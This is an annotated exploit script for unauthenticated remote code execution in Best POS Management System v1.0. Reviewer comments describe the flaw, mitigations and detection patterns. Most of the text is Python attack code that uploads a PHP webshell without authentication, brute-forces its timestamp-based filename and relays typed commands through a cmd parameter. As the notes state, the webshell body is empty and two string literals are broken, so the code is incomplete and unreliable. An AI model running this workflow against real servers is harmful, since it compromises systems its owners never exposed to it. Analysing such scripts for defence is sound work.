# Exploit Title: Best POS Management System v1.0 - Unauthenticated Remote Code Execution
# Google Dork: NA
# Date: 15/5/2023
# Exploit Author: Mesut Cetin
# Vendor Homepage: https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/kruxton.zip
# Version: 1.0
# Tested on: Kali Linux
#
# NOTE(review): as published on this page the script is not self-contained: the
# file body of the `img` multipart part is empty (see `data` below), and the two
# tag literals in `extract_output` lost their text in extraction. Read it as a
# description of the weakness rather than as runnable code.
#
# Defender's summary of what the script relies on (everything below is visible
# in the code itself):
#   * `ajax.php?action=save_settings` accepts a multipart POST that carries a
#     file part, and the script sends it with no session cookie or credentials.
#   * The uploaded file is expected to land under `/kruxton/assets/uploads/`
#     with a name of the form `<unix-timestamp>_shell.php`, i.e. the stored name
#     is derived from the server clock and keeps the client-supplied `.php`
#     extension, so it can be guessed and is served as executable PHP.
#   * Commands are passed in a `cmd` query parameter on the uploaded file.
# Mitigations follow directly: require authentication on `save_settings`,
# validate/allow-list the upload type and rename to a random name, and serve
# the uploads directory without PHP execution.
# Detection: an unauthenticated POST to `action=save_settings`, followed by a
# burst of up to 400 GETs for `assets/uploads/<digits>_shell.php` (the 0.1 s
# pacing and the 200-vs-404 pattern are distinctive), then GETs carrying `cmd=`.

import sys
import requests
import subprocess
import time

# Usage banner; the argument placeholder after "Usage: %s" appears to have been
# stripped in extraction (the example line shows a bare IPv4 address).
if len(sys.argv) < 2:
    print("\033[91mUsage: %s \033[0m" % sys.argv[0])
    print("Example: %s 192.168.106.130" % sys.argv[0])
    sys.exit(1)

ip = sys.argv[1]
# Upload endpoint. Note that nothing below authenticates against it.
url = f"http://{ip}/kruxton/ajax.php?action=save_settings"


def brute_force_timestamp(timestamp_prev, ip):
    """Locate the uploaded file by guessing its timestamp-based name.

    The candidate names are ``<timestamp>_shell.php`` under
    ``/kruxton/assets/uploads/``, where ``timestamp`` ranges over every value
    sharing the first digits of ``timestamp_prev`` (the last three decimal
    digits are enumerated: 20 outer offsets x 50 inner steps = 1000 values,
    capped at 400 probes by ``progress``). A probe counts as a hit on
    HTTP 200; everything else is treated as "not there yet".

    Args:
        timestamp_prev: Unix timestamp taken locally just before the upload
            (see ``get_unix_timestamp``); the server's clock is assumed to be
            close to it.
        ip: Target host, inserted verbatim into the URL.

    Returns:
        The URL that answered 200, or ``None`` after 400 misses.

    From a defender's view this loop is the observable part of the attack:
    hundreds of sequential GETs for non-existent ``*_shell.php`` names spaced
    ~0.1 s apart.
    """
    progress = 0
    webshell = None
    for i in range(20):
        for j in range(0, 1000, 20):
            # Keep the leading digits of timestamp_prev, enumerate the last three.
            timestamp = timestamp_prev - (timestamp_prev % 1000) + j + i
            url = f"http://{ip}/kruxton/assets/uploads/{timestamp}_shell.php"
            response = requests.get(url)
            if response.status_code == 200:
                webshell = url
                break
            progress += 1
            print(f"Attempt {progress}/400", end="\r")
            time.sleep(0.1)
            # Hard cap on probes regardless of how much of the range is left.
            # NOTE(review): nesting of this check is reconstructed from the
            # collapsed listing; it reads naturally as part of the inner loop.
            if progress >= 400:
                break
        if webshell or progress >= 400:
            break
    if webshell:
        print("\033[92m[+] Webshell found:", webshell, "\033[0m")
    else:
        print("\033[91m[-] Webshell not found\033[0m")
    return webshell


def get_unix_timestamp():
    """Return the local Unix time as an int, via ``date +%s``.

    Runs ``date`` with an argument list (no shell), so the call is not
    injectable; it does, however, make the script depend on a POSIX ``date``.
    The value is only an estimate of the server's clock, which is why the
    caller brute-forces around it.
    """
    timestamp = subprocess.check_output(['date', '+%s']).decode().strip()
    return int(timestamp)


def extract_output(response_text):
    """Cut the command output out of the response body.

    Returns the text found between ``start_tag`` and ``end_tag`` (stripped),
    or ``None`` when either marker is missing or they are out of order.

    NOTE(review): both tag literals are broken as shown — the tag text between
    the quotes was stripped when the page was extracted, leaving a newline
    inside each string, which is a SyntaxError. Presumably they were the
    opening and closing markup the uploaded file wraps its output in; that
    cannot be confirmed from this listing.
    """
    start_tag = "
"
    end_tag = "
"
    start_index = response_text.find(start_tag)
    end_index = response_text.find(end_tag)
    if start_index != -1 and end_index != -1 and start_index < end_index:
        output = response_text[start_index + len(start_tag):end_index]
        return output.strip()
    return None


def code_execution(webshell):
    """Interactive loop that sends each typed command to ``webshell``.

    Args:
        webshell: URL returned by ``brute_force_timestamp``; ``None`` prints an
            error and returns immediately.

    Each command is appended as the ``cmd`` query parameter without any
    encoding, so the parameter is plainly visible in the target's access
    logs — a cheap detection signal for this style of dropper.
    """
    if not webshell:
        print("\033[91mWebshell URI not provided\033[0m")
        return
    while True:
        command = input("Enter command to execute (or 'exit' to quit): ")
        if command == 'exit':
            break
        url = webshell + f"?cmd={command}"
        response = requests.get(url)
        output = extract_output(response.text)
        if output:
            print("\033[93m[+] Output:\033[0m")
            print(output)
        else:
            print("\033[91m[-] No output received\033[0m")


# Raw multipart body for the settings form. The form fields (name, email,
# contact, about) are filler; the interesting part is `img`, declared as
# `shell.php` with `application/x-php`. Its file content is empty here — it was
# removed when the page was extracted — which is also why the boundary lines
# appear collapsed onto one line rather than CRLF-separated.
data = '''\ -----------------------------49858899034227071432271107689 Content-Disposition: form-data; name="name" test -----------------------------49858899034227071432271107689 Content-Disposition: form-data; name="email" test@gmail.com -----------------------------49858899034227071432271107689 Content-Disposition: form-data; name="contact" 9000000000 -----------------------------49858899034227071432271107689 Content-Disposition: form-data; name="about" test -----------------------------49858899034227071432271107689 Content-Disposition: form-data; name="img"; filename="shell.php" Content-Type: application/x-php

-----------------------------49858899034227071432271107689--'''

# Hand-built headers: the boundary must match the one in `data`.
# `X-Requested-With` mimics the application's own AJAX calls; no Cookie header
# is sent, which is what makes the request unauthenticated.
headers = {
    'Host': f"{ip}",
    'X-Requested-With': 'XMLHttpRequest',
    'Content-Type': 'multipart/form-data; boundary=---------------------------49858899034227071432271107689',
    'Content-Length': str(len(data)),
    'Connection': 'close'
}

# Sample the clock immediately before the upload so the brute-force window
# brackets the server-side timestamp used in the stored filename.
timestamp_prev = get_unix_timestamp()
response = requests.post(url, data=data, headers=headers)
# The endpoint is expected to answer the literal string '1' on success.
if response.status_code == 200 and response.text == '1':
    print("[+] Timestamp: %s" % timestamp_prev)
    print("\033[92m[+] Successly uploaded shell! Unauthenticated! \033[0m")
    webshell = brute_force_timestamp(timestamp_prev, ip)
    code_execution(webshell)
else:
    print("Did not worked")